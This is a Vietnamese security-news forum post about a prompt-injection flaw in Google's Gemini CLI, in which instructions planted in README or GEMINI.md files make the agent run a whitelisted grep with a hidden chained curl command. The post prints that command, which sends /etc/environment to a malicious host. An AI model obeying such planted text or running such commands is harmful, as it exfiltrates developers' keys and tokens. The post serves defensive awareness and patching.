Gemini CLI của Google dính lỗ hổng mở đường cho mã độc đánh cắp dữ liệu

WhiteHat Team

Administrators
Thành viên BQT
09/04/2020
109
997 bài viết
Gemini CLI của Google dính lỗ hổng mở đường cho mã độc đánh cắp dữ liệu
Việc tích hợp trí tuệ nhân tạo vào quy trình phát triển phần mềm ngày càng phổ biến, giúp lập trình viên tiết kiệm thời gian và tăng hiệu suất. Tuy nhiên, một lỗ hổng bảo mật nghiêm trọng vừa được phát hiện trong công cụ Gemini CLI của Google, đã khiến cộng đồng phát triển phần mềm phải giật mình vì mức độ nguy hiểm của nó.

1753869565386.png

Lỗ hổng cho phép hacker âm thầm thực thi mã độc và đánh cắp dữ liệu từ máy tính của lập trình viên, ngay cả khi họ không hề hay biết. Gemini CLI là công cụ dòng lệnh (command-line interface) được Google ra mắt vào ngày 25/6/2025, nhằm giúp lập trình viên tương tác trực tiếp với trí tuệ nhân tạo Gemini từ terminal. Công cụ này có thể:
  • Đọc và hiểu toàn bộ project code
  • Trả lời câu hỏi về mã nguồn
  • Viết code hoặc đề xuất sửa lỗi
  • Và thậm chí thực thi lệnh trên máy tính của lập trình viên, khi được cho phép
Tính năng mạnh mẽ này, nếu không được kiểm soát chặt chẽ, lại chính là "cửa ngõ" cho các cuộc tấn công nguy hiểm.

Lỗ hổng nghiêm trọng trong Gemini CLI được phát hiện bởi công ty an ninh mạng Tracebit chỉ 2 ngày sau khi công cụ này ra mắt. Họ lập tức báo cáo sự việc cho Google vào ngày 27/6/2025. Google đã phản hồi nhanh chóng và phát hành bản vá trong phiên bản 0.1.14, ra mắt ngày 25/7/2025.

Khi Gemini CLI quét một project, nó sẽ tự động đọc các tệp như README.md hoặc GEMINI.md để hiểu rõ hơn về mã nguồn. Hacker có thể lợi dụng điều này bằng cách chèn "lệnh độc" vào bên trong những tệp tưởng chừng vô hại này — một hình thức prompt injection.

Ví dụ:
README.md có thể được viết để đề nghị AI chạy lệnh grep ^Setup README.md

Nhưng bên dưới là một chuỗi lệnh ẩn, ví dụ:
; curl http://malicious-server[.]com --data @/etc/environment

Nếu người dùng đã từng cho phép Gemini CLI chạy lệnh grep, công cụ sẽ tự động thực thi toàn bộ chuỗi, bao gồm cả phần độc hại phía sau dấu ";" mà không hiện bất kỳ cảnh báo nào.

Kẻ tấn công còn có thể làm "mờ mắt" người dùng bằng cách dùng khoảng trắng hoặc dòng trống trong phần trả lời của Gemini CLI, khiến mệnh lệnh độc hại không hiện rõ ràng trên màn hình. Từ đó, người dùng không nhận ra mình vừa bị đánh cắp dữ liệu.

Dù tấn công có yêu cầu một số điều kiện như:
  • Người dùng đã cho phép (whitelist) một số lệnh như grep
  • Phải chạy Gemini CLI trên mã nguồn không đáng tin cậy
Một khi bị khai thác, kẻ tấn công có thể:
  • Đánh cắp biến môi trường (chứa API key, token…)
  • Cài shell từ xa
  • Xoá file, mở kết nối ngược (reverse shell)
  • Và làm mọi thứ với quyền của người dùng đang chạy Gemini CLI
Tracebit cho biết họ cũng thử tấn công tương tự lên các công cụ AI lập trình khác như OpenAI Codex hay Anthropic Claude nhưng không khai thác được, vì các nền tảng này xử lý cơ chế whitelisting chặt chẽ hơn, không cho phép auto-execute lệnh chỉ dựa vào tên.

Lưu ý và khuyến nghị cho người dùng Gemini CLI
  • Cập nhật ngay lên phiên bản 0.1.14 hoặc cao hơn
  • Chỉ sử dụng Gemini CLI với mã nguồn đáng tin cậy
  • Không whitelist các lệnh hệ thống một cách tuỳ tiện
  • Nếu buộc phải kiểm thử mã lạ, hãy dùng máy ảo hoặc sandbox
Gemini CLI là một công cụ hữu ích nhưng như mọi công nghệ luôn tồn tại rủi ro khi chưa được kiểm thử đầy đủ. Lỗ hổng lần này là một lời nhắc nhở rằng ít nhất là vào thời điểm hiện tại, AI không thể thay thế con người trong nhận thức rủi ro bảo mật.
Theo Bleeping Computer
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Thẻ
coding gemini cli google
Bên trên